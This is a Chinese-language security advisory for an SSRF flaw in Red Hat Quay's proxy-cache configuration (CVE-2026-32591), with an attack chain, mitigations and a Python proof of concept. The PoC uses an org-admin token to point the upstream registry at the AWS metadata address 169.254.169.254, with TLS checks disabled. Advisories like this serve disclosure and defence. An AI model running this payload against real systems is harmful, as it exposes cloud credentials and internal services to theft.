CVE-2026-32591 CVSS 5.2 中危

CVE-2026-32591 Red Hat Quay 代理缓存SSRF漏洞

披露日期: 2026-04-08

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-32591

漏洞类型

服务器端请求伪造 (SSRF)

CVSS评分

5.2 中危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

需要交互 (UI:R)

影响产品

Red Hat Quay

漏洞概述

Red Hat Quay 的代理缓存配置功能存在安全缺陷。当组织管理员配置上游注册表时，系统未严格验证主机名的合法性。攻击者可利用此漏洞，通过构造指向内部服务的恶意主机名，强制 Quay 服务器向内网资源或云基础设施端点发起请求，从而非法访问受限资源，造成信息泄露风险。

技术细节

该漏洞源于 Red Hat Quay 在处理代理缓存配置时的输入验证缺失。当具有组织管理员权限的用户配置上游注册表时，Quay 会直接根据用户提供的主机名建立网络连接。由于缺乏对主机名指向性的严格校验（例如是否解析为内网 IP 或元数据服务地址），攻击者可以注入恶意的主机名（如 `http://169.254.169.254/latest/meta-data/`）。这将导致 Quay 服务器作为代理向内部服务发起 HTTP 请求，利用服务器的高权限网络位置探测内网拓扑或窃取云平台元数据，造成敏感信息泄露。此漏洞结合高权限账户可被用于进一步的内网横向移动。

攻击链分析

STEP 1

步骤1：获取权限

攻击者获取 Red Hat Quay 组织管理员权限。

STEP 2

步骤2：访问配置

攻击者登录 Quay 控制台，进入组织设置中的代理缓存配置页面。

STEP 3

步骤3：注入Payload

攻击者在配置上游注册表时，输入指向内部敏感服务（如云元数据服务）的恶意主机名。

STEP 4

步骤4：执行SSRF

Quay 服务器接收配置并尝试连接该恶意地址，导致服务器向内网发起请求，泄露信息。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# Proof of Concept for CVE-2026-32591
# This script demonstrates how a malicious admin could configure an upstream registry
# pointing to an internal service (e.g., AWS Metadata service).

import requests

TARGET_URL = "https://quay.example.com/api/v1/organization/testorg/registry"
TOKEN = "Bearer <org_admin_token>"
# Malicious hostname pointing to AWS Metadata service
MALICIOUS_HOST = "http://169.254.169.254/latest/meta-data/"

payload = {
    "registry": "internal-registry",
    "external_registry": MALICIOUS_HOST,
    "proxy_cache": True
}

headers = {
    "Authorization": TOKEN,
    "Content-Type": "application/json"
}

# Send request to create/update proxy cache configuration
response = requests.post(TARGET_URL, json=payload, headers=headers, verify=False)

if response.status_code == 200:
    print("Successfully configured malicious upstream registry.")
    print("Quay server will now attempt to connect to internal metadata.")
else:
    print(f"Failed: {response.text}")

影响范围

Red Hat Quay (具体受影响版本请参考 RHSA-2026:19375)

防御指南

临时缓解措施

在应用补丁前，严格限制组织管理员权限，避免授予不可信用户。通过网络策略限制 Quay 服务器对外部及内部网络的非必要访问，特别是阻断其对云元数据服务 IP（如 169.254.169.254）和内网敏感网段的连接。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表